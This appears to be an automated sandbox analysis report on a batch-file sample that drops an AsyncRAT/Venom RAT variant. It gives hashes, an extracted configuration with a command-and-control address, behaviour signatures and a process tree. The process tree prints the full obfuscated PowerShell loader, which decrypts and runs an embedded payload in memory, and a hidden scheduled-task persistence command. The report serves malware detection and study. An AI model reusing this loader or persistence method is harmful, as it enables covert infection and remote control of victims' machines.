Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
01/03/2024, 02:05
Static task
static1
General
-
Target
Update.bat
-
Size
305KB
-
MD5
9464dc08a0c7c87065f6caed75dec6bd
-
SHA1
158d22a58c9ba314a076a62a8bcec466fc1e4165
-
SHA256
90253e1be6b5b8928661ce82317b156e1ed4a974e1c6def34414495191e8f50f
-
SHA512
b8b0dd38c60f8e81fcc9d2efcc76a669441c078aebbb2276c690315002eccc4fcb0317b29c8e542dd7795f2326775212fe4f68af00065afeadc6efcb7e693812
-
SSDEEP
6144:Gki8FUxdLGV2qz4aXJVf2cW9A3KAa9K+9E8KTVNlaMwg49oKkIaeF:GX8FqtGVBzfX/f2CaAaXc9TFuofm
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
nostale
163.5.215.225:1602
hoosnuxddbjezlt
-
delay
1
-
install
false
-
install_file
svchost
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/memory/4340-97-0x000001CB2EDD0000-0x000001CB2EDE8000-memory.dmp family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation Update.bat.exe Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 3156 Update.bat.exe 4340 startup_str_424.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings Update.bat.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3156 Update.bat.exe 3156 Update.bat.exe 4924 powershell.exe 4924 powershell.exe 3888 powershell.exe 3888 powershell.exe 3888 powershell.exe 4340 startup_str_424.bat.exe 4340 startup_str_424.bat.exe 4340 startup_str_424.bat.exe 4320 powershell.exe 4320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3156 Update.bat.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeIncreaseQuotaPrivilege 4924 powershell.exe Token: SeSecurityPrivilege 4924 powershell.exe Token: SeTakeOwnershipPrivilege 4924 powershell.exe Token: SeLoadDriverPrivilege 4924 powershell.exe Token: SeSystemProfilePrivilege 4924 powershell.exe Token: SeSystemtimePrivilege 4924 powershell.exe Token: SeProfSingleProcessPrivilege 4924 powershell.exe Token: SeIncBasePriorityPrivilege 4924 powershell.exe Token: SeCreatePagefilePrivilege 4924 powershell.exe Token: SeBackupPrivilege 4924 powershell.exe Token: SeRestorePrivilege 4924 powershell.exe Token: SeShutdownPrivilege 4924 powershell.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeSystemEnvironmentPrivilege 4924 powershell.exe Token: SeRemoteShutdownPrivilege 4924 powershell.exe Token: SeUndockPrivilege 4924 powershell.exe Token: SeManageVolumePrivilege 4924 powershell.exe Token: 33 4924 powershell.exe Token: 34 4924 powershell.exe Token: 35 4924 powershell.exe Token: 36 4924 powershell.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeIncreaseQuotaPrivilege 3888 powershell.exe Token: SeSecurityPrivilege 3888 powershell.exe Token: SeTakeOwnershipPrivilege 3888 powershell.exe Token: SeLoadDriverPrivilege 3888 powershell.exe Token: SeSystemProfilePrivilege 3888 powershell.exe Token: SeSystemtimePrivilege 3888 powershell.exe Token: SeProfSingleProcessPrivilege 3888 powershell.exe Token: SeIncBasePriorityPrivilege 3888 powershell.exe Token: SeCreatePagefilePrivilege 3888 powershell.exe Token: SeBackupPrivilege 3888 powershell.exe Token: SeRestorePrivilege 3888 powershell.exe Token: SeShutdownPrivilege 3888 powershell.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeSystemEnvironmentPrivilege 3888 powershell.exe Token: SeRemoteShutdownPrivilege 3888 powershell.exe Token: SeUndockPrivilege 3888 powershell.exe Token: SeManageVolumePrivilege 3888 powershell.exe Token: 33 3888 powershell.exe Token: 34 3888 powershell.exe Token: 35 3888 powershell.exe Token: 36 3888 powershell.exe Token: SeIncreaseQuotaPrivilege 3888 powershell.exe Token: SeSecurityPrivilege 3888 powershell.exe Token: SeTakeOwnershipPrivilege 3888 powershell.exe Token: SeLoadDriverPrivilege 3888 powershell.exe Token: SeSystemProfilePrivilege 3888 powershell.exe Token: SeSystemtimePrivilege 3888 powershell.exe Token: SeProfSingleProcessPrivilege 3888 powershell.exe Token: SeIncBasePriorityPrivilege 3888 powershell.exe Token: SeCreatePagefilePrivilege 3888 powershell.exe Token: SeBackupPrivilege 3888 powershell.exe Token: SeRestorePrivilege 3888 powershell.exe Token: SeShutdownPrivilege 3888 powershell.exe Token: SeDebugPrivilege 3888 powershell.exe Token: SeSystemEnvironmentPrivilege 3888 powershell.exe Token: SeRemoteShutdownPrivilege 3888 powershell.exe Token: SeUndockPrivilege 3888 powershell.exe Token: SeManageVolumePrivilege 3888 powershell.exe Token: 33 3888 powershell.exe Token: 34 3888 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3060 wrote to memory of 3156 3060 cmd.exe 93 PID 3060 wrote to memory of 3156 3060 cmd.exe 93 PID 3156 wrote to memory of 4924 3156 Update.bat.exe 95 PID 3156 wrote to memory of 4924 3156 Update.bat.exe 95 PID 3156 wrote to memory of 3888 3156 Update.bat.exe 98 PID 3156 wrote to memory of 3888 3156 Update.bat.exe 98 PID 3156 wrote to memory of 3924 3156 Update.bat.exe 100 PID 3156 wrote to memory of 3924 3156 Update.bat.exe 100 PID 3924 wrote to memory of 876 3924 WScript.exe 101 PID 3924 wrote to memory of 876 3924 WScript.exe 101 PID 876 wrote to memory of 4340 876 cmd.exe 103 PID 876 wrote to memory of 4340 876 cmd.exe 103 PID 4340 wrote to memory of 4320 4340 startup_str_424.bat.exe 104 PID 4340 wrote to memory of 4320 4340 startup_str_424.bat.exe 104
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Update.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\Update.bat.exe"Update.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RBmaF = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($_CASH_IjfQb in $_CASH_RBmaF) { if ($_CASH_IjfQb.StartsWith(':: @')) { $_CASH_rvGhe = $_CASH_IjfQb.Substring(4); break; }; };$_CASH_rvGhe = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rvGhe, '_CASH_', '');$_CASH_DkAdB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rvGhe);$_CASH_lMgXj = New-Object System.Security.Cryptography.AesManaged;$_CASH_lMgXj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_lMgXj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_lMgXj.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/1ndH6+lrsjZ2yYUNqKgNPGrHYX/Tct5RucmyyX+KDY=');$_CASH_lMgXj.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qky27F+ZQUxwHZWbtyy/7w==');$_CASH_fRgtG = $_CASH_lMgXj.CreateDecryptor();$_CASH_DkAdB = $_CASH_fRgtG.TransformFinalBlock($_CASH_DkAdB, 0, $_CASH_DkAdB.Length);$_CASH_fRgtG.Dispose();$_CASH_lMgXj.Dispose();$_CASH_BbdgF = New-Object System.IO.MemoryStream(, $_CASH_DkAdB);$_CASH_RhuKx = New-Object System.IO.MemoryStream;$_CASH_PnSrr = New-Object System.IO.Compression.GZipStream($_CASH_BbdgF, [IO.Compression.CompressionMode]::Decompress);$_CASH_PnSrr.CopyTo($_CASH_RhuKx);$_CASH_PnSrr.Dispose();$_CASH_BbdgF.Dispose();$_CASH_RhuKx.Dispose();$_CASH_DkAdB = $_CASH_RhuKx.ToArray();$_CASH_LuMET = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DkAdB);$_CASH_wBIxo = $_CASH_LuMET.EntryPoint;$_CASH_wBIxo.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Update')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_424_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_424.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_424.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_424.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Users\Admin\AppData\Roaming\startup_str_424.bat.exe"startup_str_424.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RBmaF = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_424.bat').Split([Environment]::NewLine);foreach ($_CASH_IjfQb in $_CASH_RBmaF) { if ($_CASH_IjfQb.StartsWith(':: @')) { $_CASH_rvGhe = $_CASH_IjfQb.Substring(4); break; }; };$_CASH_rvGhe = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rvGhe, '_CASH_', '');$_CASH_DkAdB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rvGhe);$_CASH_lMgXj = New-Object System.Security.Cryptography.AesManaged;$_CASH_lMgXj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_lMgXj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_lMgXj.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/1ndH6+lrsjZ2yYUNqKgNPGrHYX/Tct5RucmyyX+KDY=');$_CASH_lMgXj.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qky27F+ZQUxwHZWbtyy/7w==');$_CASH_fRgtG = $_CASH_lMgXj.CreateDecryptor();$_CASH_DkAdB = $_CASH_fRgtG.TransformFinalBlock($_CASH_DkAdB, 0, $_CASH_DkAdB.Length);$_CASH_fRgtG.Dispose();$_CASH_lMgXj.Dispose();$_CASH_BbdgF = New-Object System.IO.MemoryStream(, $_CASH_DkAdB);$_CASH_RhuKx = New-Object System.IO.MemoryStream;$_CASH_PnSrr = New-Object System.IO.Compression.GZipStream($_CASH_BbdgF, [IO.Compression.CompressionMode]::Decompress);$_CASH_PnSrr.CopyTo($_CASH_RhuKx);$_CASH_PnSrr.Dispose();$_CASH_BbdgF.Dispose();$_CASH_RhuKx.Dispose();$_CASH_DkAdB = $_CASH_RhuKx.ToArray();$_CASH_LuMET = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DkAdB);$_CASH_wBIxo = $_CASH_LuMET.EntryPoint;$_CASH_wBIxo.Invoke($null, (, [string[]] ('')))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_424')6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5c118e29489863b7d5859e4e697842329
SHA1ede543c75580fa7caba7d21f42d674248e3c0885
SHA25622d4ec09704d261479cf9521f93ba4840fbe93601f69fb2dd71e6c936dcae091
SHA512868ba879e1a4e5c43824abd70b29ac97a8153b8f9dc49b8d378ca465715ab1833d3d87ba5a0eb4eb7543b5d8cc561946441626e25c0c60afb90bea020113ed44
-
Filesize
1KB
MD575b4b2eecda41cec059c973abb1114c0
SHA111dadf4817ead21b0340ce529ee9bbd7f0422668
SHA2565540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134
SHA51287feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
305KB
MD59464dc08a0c7c87065f6caed75dec6bd
SHA1158d22a58c9ba314a076a62a8bcec466fc1e4165
SHA25690253e1be6b5b8928661ce82317b156e1ed4a974e1c6def34414495191e8f50f
SHA512b8b0dd38c60f8e81fcc9d2efcc76a669441c078aebbb2276c690315002eccc4fcb0317b29c8e542dd7795f2326775212fe4f68af00065afeadc6efcb7e693812
-
Filesize
115B
MD583d919541b76e7700dd6231df023a63f
SHA14245c5c94237946cd8eda053970ae4df2d1152aa
SHA256497c5baee4eb969a2d5c7fc0e65b4c9d8dedbc8c9b6843ce7d1d84c8b0cc6167
SHA5123306bdc1a35348aeb3d369b043373984a1faa4a97b193e67b12c514294d8440c66a1e83d29b2fa7a94b878474258788107173ea7283f5f608ade49e48ef4d181